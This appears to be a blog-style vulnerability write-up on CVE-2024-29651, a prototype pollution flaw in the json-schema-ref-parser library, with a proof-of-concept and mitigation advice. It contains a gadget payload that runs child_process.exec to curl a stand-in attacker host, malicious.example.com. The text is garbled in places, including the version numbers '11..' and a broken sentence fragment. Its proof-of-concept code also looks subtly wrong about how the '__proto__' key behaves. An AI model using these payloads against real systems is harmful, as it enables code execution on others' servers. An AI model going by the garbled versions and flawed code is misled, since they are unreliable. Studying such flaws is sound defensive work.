---
Introduction
In March 2024, a significant security flaw was discovered in the widely-used json-schema-ref-parser library. Tracked as CVE-2024-29651, this vulnerability affects versions 11.. and 11.1.. The bug allows remote attackers to launch prototype pollution attacks, which can escalate all the way to arbitrary code execution through the library’s bundle(), parse(), resolve(), and dereference() functions.
This article breaks down how this vulnerability works, why it’s dangerous, and walks through a proof-of-concept exploit. You’ll also find references to the original advisory and related resources.
What is Prototype Pollution?
Prototype pollution is a type of security issue in JavaScript applications whereby an attacker can manipulate an object’s prototype. By injecting properties into Object.prototype, the attacker affects all objects derived from it—possibly crashing applications, bypassing security, or executing arbitrary code.
If a library processes untrusted input and fails to filter or whitelist properties like __proto__, an attacker can take control of assumptions made by your codebase.
About json-schema-ref-parser
json-schema-ref-parser is a popular library for resolving $ref pointers in JSON schemas, used in OpenAPI/Swagger tools, validators, and parser stacks across the Node.js/JavaScript ecosystem.
dereference()
take, parse, and resolve JSON schema documents provided by users.
The Vulnerability Explained
The bug allows attackers to send specially-crafted schema documents. When the vulnerable functions are called (bundle, parse, etc.), the parser fails to block dangerous references like __proto__ or constructor. As a result, malicious properties are merged into the base Object.prototype of your entire Node.js process.
Code Snippet: Proof-of-Concept
Below is a minimal Node.js proof-of-concept showing how a crafted payload can mutate the global object prototype by exploiting CVE-2024-29651:
const $RefParser = require('json-schema-ref-parser');
const maliciousSchema = {
"title": "attack",
"__proto__": {
"polluted": "YES, YOU ARE VULNERABLE!"
}
};
(async () => {
await $RefParser.parse(maliciousSchema);
// Now all plain objects have the 'polluted' property
if ({}.polluted === "YES, YOU ARE VULNERABLE!") {
console.log("[!] Successful prototype pollution!");
}
})();
What just happened? By feeding the object with __proto__ property, and having json-schema-ref-parser process it, you polluted the global prototype. Every object now has polluted attached.
Exploit Path: Where Does It Get Serious?
Prototype pollution doesn’t always mean RCE (remote code execution). But many apps—including those using popular frameworks or libraries—rely on property names dynamically. With pollution, attackers may:
Bypass access control
- Inject new functions that eventually lead to eval(), child_process.exec, or constructor gadgets often used in Node.js apps
Dangerous Gadgets
// The attacker pollutes Object.prototype with a function
maliciousSchema = {
"__proto__": {
"toString": function() {
require('child_process').exec('curl malicious.example.com/?pwned');
return "hacked!";
}
}
};
If an app later calls {}.toString(), it executes the injected function.
Mitigation
- Upgrade Now! This vulnerability is fixed in json-schema-ref-parser v11.1.1.
- Sanitize input: Denylist or deeply filter keys like __proto__, constructor, or prototype from any user-supplied objects.
References
- Original NVD Advisory for CVE-2024-29651
- json-schema-ref-parser v11.1.1 Release Notes
- OWASP: Prototype Pollution
- Responsible Disclosure Thread
Conclusion
CVE-2024-29651 is a high-impact flaw that threatens apps using vulnerable versions of json-schema-ref-parser. It is simple to exploit and can lead to full compromise in certain Node.js deployments. If you use this library—directly or indirectly—upgrade immediately and audit your dependency tree.
Timeline
Published on: 05/20/2024 18:15:10 UTC
Last modified on: 08/20/2024 14:35:13 UTC